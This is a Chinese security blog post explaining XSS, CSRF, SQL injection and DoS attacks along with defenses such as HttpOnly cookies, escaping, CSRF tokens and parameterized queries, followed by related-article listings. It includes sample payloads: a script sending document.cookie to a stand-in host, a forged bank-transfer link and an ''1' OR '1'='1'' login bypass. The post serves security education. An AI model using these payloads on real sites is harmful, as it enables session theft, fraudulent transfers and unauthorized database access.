几种常见的攻击技术及防范

最新推荐文章于 2024-08-08 09:19:18 发布
最新推荐文章于 2024-08-08 09:19:18 发布
阅读量2.9k 收藏 2
点赞数 1
分类专栏: 攻击技术 文章标签: XSS CSRF DOS攻击 SQL注入

一、XSS

概念

XSS - 跨站脚本攻击(Cross-Site Scripting),可以将代码注入到用户浏览的网页上,这种代码包括HTML和JavaScript。

例如有一个论坛网站,攻击者可以在上面发布一下内容:

<script>alert("垃圾内容");</script>

如果该网站没有做XSS防范的话,其他用户浏览的页面包含此内容时就会弹出这样的垃圾内容,影响用户体验,造成用户流失。

攻击者也可以发布一条这样的内容:

<script>location.href="http://bug.com?c=" + document.cookie</script>

当用户浏览了含有这个内容的页面将会跳转到bug.com并携带了当前作用域的Cookie信息。如果这个论坛网站通过Cookie管理用户登录状态,那么攻击者就可以通过这个Cookie登录被攻击者的账号了。

危害
  • 投放垃圾广告
  • 窃取用户的Cookie值
  • 伪造虚假的输入表单骗取个人信息
防范

1、设置Cookie为HttpOnly
设置了HttpOnly的Cookie可以防止JavaScript脚本调用,就无法通过document.cookie获取用户Cookie信息。

2、过滤特殊字符
例如将<转义为&lt;,将>转义为&gt;,从而避免HTML和Jascript代码的运行。
富文本编辑器
富文本编辑器通常采用XSS filter来防范XSS攻击,可以定义一些标签白名单或者黑名单,从而不允许有攻击性的HTML代码的输入。

二、CSRF

概念

CSRF - 跨站请求伪造(Cross-site request forgery),是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如转账或购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户在操作而去执行。

XSS利用的是用户对指定网站的信任,CSRF利用的则是网站对用户浏览器的信任。

假如一家银行用以执行转账操作的URL地址如下:

http://www.bank.com/transferAccounts?account=AccoutName&amount=num&for=ToName。

那么,一个恶意攻击者可以在其他网站上放置如下链接:

<a href="http://www.bank.com/transferAccounts?account=Tom&amount=10000&for=Jerry">点我有惊喜哦</a>

如果有账户名为Tom的用户访问了恶意站点,而她之前刚访问过银行不久,登录信息尚未过期,那么她就会损失10000。

这种恶意的网址可以有很多种形式,藏身于网页中的许多地方。此外,攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛,博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话,用户即使访问熟悉的可信网站也有受攻击的危险。

透过例子能够看出,攻击者并不能通过CSRF攻击来直接获取用户的账户控制权,也不能直接窃取用户的任何信息。他们能做到的,是欺骗用户浏览器,让其以用户的名义执行操作。

防范

1、添加校验 Token

在访问敏感数据请求时,要求用户浏览器提供不保存在Cookie中,并且攻击者无法伪造的数据作为校验。例如服务器生成随机数并附加在表单中,并要求客户端传回这个随机数。

2、输入验证码

因为CSRF攻击是在用户无意识的情况下发生的,所以要求用户输入验证码可以让用户知道自己正在做的操作。也可以要求用户输入验证码来进行校验。

SQL注入攻击

概念

服务器上的数据库运行非法的SQL语句,主要通过拼接来完成。

例如一个网站登录验证的SQL查询代码如下:

sql_str = "SELECT * FROM users WHERE (username = '" + userName + "') and (password = '"+ passWord +"');"

当填入的信息为:

userName = "1' OR '1'='1";
passWord = "1' OR '1'='1";

那么此时sql_str为:

sql_str = "SELECT * FROM users WHERE (username = '1' OR '1'='1') and (password = '1' OR '1'='1');"

该SQL语句等效于:

sql_str = "SELECT * FROM users;"

无需验证即可执行查询

防范

1、使用参数化查询
Java 中的PreparedStatement是预先编译的SQL语句,可以传入适当参数并且多次执行。由于没有拼接的过程,因此可以防止SQL注入的发生。
2、单引号转换
将传入的参数中的单引号转换为连续两个单引号。

Dos攻击

概念

Dos - 拒绝服务攻击(denial-of-service attack),也称为洪水攻击,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其他正常用户无法访问。

DDos - 分布式拒绝服务攻击(distributed denial-of-service attack),指攻击者使用网络上两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。

参考资料

攻击技术

fwhui
关注
专栏目录
AI安全---对抗攻击防御措施
草棚
06-02 3768
目前,在对抗攻击防御上存在三个主要方向: 1)在学习过程中修改训练过程或者修改的输入样本。 2)修改网络,比如:添加更多层/子网络、改变损失/激活函数等。 3)当分类未见过的样本时,用外部模型作为附加网络。 1.改训练过程/ 输入数据 1 蛮力对抗训练 通过不断输入新类型的对抗样本并执行对抗训练,从而不断提升网络的鲁棒性。为了保证有效性,该方法需要使用高强度的对抗样本,并且网络架构要有充足的...
 缓冲区溢出攻击的原理和防范技术分析
01-30
从软件角度讲,有以下几种主要的防范技术: 1. 编译器级别的防御技术:现代编译器提供了多种安全增强选项,可以对源代码进行静态分析和运行时保护,例如: - 栈保护:利用额外的“canary”值或者其他机制来检测栈...
常见的网络安全攻击及防御技术概述
2201_75362610的博客
03-22 2148
网络安全技术涉及从物理层到业务层的各个层面,贯穿产品设计到产品上线运营的全流程。现阶段网络攻击的方式和种类也随着互联网技术的发展而不断迭代,做好网络安全防护的前提是我们要对网络攻击有充分的了解。下文将抛砖引玉对常见的网络安全攻击及防御技术进行简单介绍。1、防拒绝服务攻击拒绝服务攻击可以理解为攻击者以消耗被攻击者可用资源为手段,以达到网络资源和系统资源消耗殆尽为目的,从而使被攻击者无法响应正常的业务请求。拒绝服务攻击是黑客常用的攻击手段之一,一般我们把拒绝服务攻击分为网络资源类和系统资源类。
常见网络攻击方式及防御方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
08-08 1022
网络安全威胁的不断演变和增长,网络攻击的种类和数量也在不断增加,攻防对抗实战演练在即,让我们一起了解一下常见网络攻击方式及防御方法。
10大常见网络安全攻击手段及防御方法总结_网络攻击技术常见类型和手段
2201_75735270的博客
04-09 2588
相关研究表明,跨站脚本攻击大约占据了所有攻击的40%,是最为常见的一类网络攻击。但尽管最为常见,大部分跨站脚本攻击却不是特别高端,多为业余网络罪犯使用别人编写的脚本发起的。跨站脚本针对的是网站的用户,而不是Web应用本身。恶意黑客在有漏洞的网站里注入一段代码,然后网站访客执行这段代码。此类代码可以入侵用户账户,激活木马程序,或者修改网站内容,诱骗用户给出私人信息。防御方法:设置Web应用防火墙可以保护网站不受跨站脚本攻击危害。WAF就像个过滤器,能够识别并阻止对网站的恶意请求。
常见网络攻击手法
purpen
07-27 1527
1、口令入侵  所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机,然后再实施攻击活动。这种方法的前提是必须先得到该主机上的某个合法用户的帐号,然后再进行合法用户口令的破译。获得普通用户帐号的方法很多,如  利用目标主机的Finger功能:当用Finger命令查询时,主机系统会将保存的用户资料(如用户名、登录时间等)显示在终端或计算机上;  利用目标主机的X.500服务:有些主机没有关闭X...
攻击介绍
实践求真知
11-22 2149
常见攻击方法 1、SYN攻击 2、Ddos攻击 3、恶意扫描   二 什么是SYN攻击 利用TCP协议缺陷进行,导致系统服务停止响应,网络带宽跑满或者响应缓慢。   三 什么是Ddos攻击 分布式访问拒绝服务攻击   四 三次握手图例     五 SYN攻击原理     六 SYN攻击的影响以及应对措施 1、如果攻击比较频繁,会不断增加backlog队
数据库常见攻击方法及防范.docx
06-08
SQL注入是一种常见的数据库攻击方法,攻击者通过将恶意SQL代码插入到应用程序接收的输入字段中,以此来获取数据库中的敏感信息或执行非法操作。为了防御SQL注入攻击,可以采取以下几种措施: - **参数化查询**:...
SQL注入攻击防范技术研究.pdf
09-19
SQL注入攻击是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统。攻击者通过在应用程序的用户输入字段中插入恶意SQL代码,利用程序处理用户输入时的漏洞,来执行非授权的数据库操作。这种...
路由器防范拒绝服务攻击技术研究.pdf
10-09
在文章部分内容中,提到了几种路由器防范DoS攻击技术方法: 1. IP路径重构技术(IP traceback):这是一种追踪攻击源的技术,由Stefan Savage提出,通过记录数据包的路径信息,帮助定位发起攻击的源头,以便采取反...
PHP常见几种攻击方式实例小结
10-17
本文对PHP中几种常见的网络攻击方式进行了实例化的小结,主要阐述了SQL注入攻击、跨站脚本攻击XSS)、文件包含漏洞三种攻击方法。通过具体的实例分析,深入讲解了攻击者如何利用这些漏洞,以及可能造成的后果。 ...
xss根据白名单过滤HTML防止XSS攻击
08-12
xss是一个用于对用户输入的内容进行过滤,以避免遭受XSS攻击的模块 (什么是XSS攻击?)。主要用于论坛、博客、网上商店等等一些可允许用户录入页面排版、 格式控制相关的HTML的场景,xss模块通过白名单来控制允许的标签及相关的标签属性。
网络攻击方法分析与防范措施
热门推荐
askunix
05-13 2万+
推荐阅读(仅仅三页内容):常见网络攻击手段分析及防御原理 一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面我就总结几种常见的漏洞的简介与攻击原理分析 前奏: 什么是网络安全 黑客入侵技术的发展 攻击技术: 一、DoS攻击:   不是用DoS操作系统攻击,其全称为Denial of Service——拒绝服务。它通过协议方式,或抓...
预防数据库攻击的正确做法:
IT技术宅-北方的刀郎
03-21 926
预防数据库攻击的正确做法:magic_quotes_gpc=On的时候,函数get_magic_quotes_gpc()就会返回1当magic_quotes_gpc=Off的时候,函数get_magic_quotes_gpc()就会返回0因此可以看出这个get_magic_quotes_gpc()函数的作用就是得到环境变量magic_quotes_gpc的值。既然在PHP6中删除了magic_qu
免受 DDoS 攻击的五种技术
kkwlss的博客
10-26 502
购买额外的带宽和增加网站的服务器容量是减轻 DDoS 攻击影响的两个绝妙策略。如果您的网站可以同时容纳 100 万用户,并且 DDoS 攻击只会发送 500,000 名虚假访问者,那么您的网站将继续正常运行。避免 DDoS 攻击的理想策略是修复您网站的所有问题。如果您有一个 WordPress 网站,请确保定期更新您使用的版本,以便该软件具有最新的DDoS攻击保护。例如,如果您在北京的服务器和上海的服务器上托管您的网站,则您增加了网站在互联网上的覆盖范围,使攻击者更难对您发起 DDoS 攻击
网络防御技术整理
yz_weixiao的博客
12-26 2103
虚拟局域网(Virtual Private Network)是指在两台计算机或两个网络之间之间建立的一条穿越公共网络的专用连接。一般地,这样的专有连接是通过隧道技术、加密和密钥管理、认证和访问控制等实现与专用网类似的安全性能,从而达到在Internet上安全传输机密数据的目的。
如何防范常见的Web攻击
大大肉包博客
10-30 736
今天,从开发人员的角度,并结合我在开发过程中遇到的问题,说说《如何防范常见的Web攻击》话题。 SQL注入攻击 SQL注入攻击,这个是最常聊到的话题,使用过Java的开发人员,第一个反应就是一定要使用预编译的PrepareStatement,是吧? 什么是SQL注入攻击 攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中...
常见的六种必用攻击手段
w3cschools的博客
04-07 8195
  东方联盟创始人,知名网络安全专家郭盛华曾表示:互联网正在改变人们的生活、休闲与工作,改变人类社会的方方面面,世界已经进入互联网时代,未来黑客安全会成为世界性话题,黑客攻防术也是进军IT行业必掌握的其中技能之一。那么,黑客常见几种技术手段有哪些呢?黑客教父郭盛华作出以下分析: 什么是VPN服务?   虚拟专用网络(或VPN)是您的设备与另一台计算机之间通过互联网的安全连接。VPN服务可用于在...
网络攻击常见技术方法及案例分析
我的个人博客
08-19 1万+
网络攻击概述、网络攻击常见技术方法、黑客常用工具、网络攻击案例分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值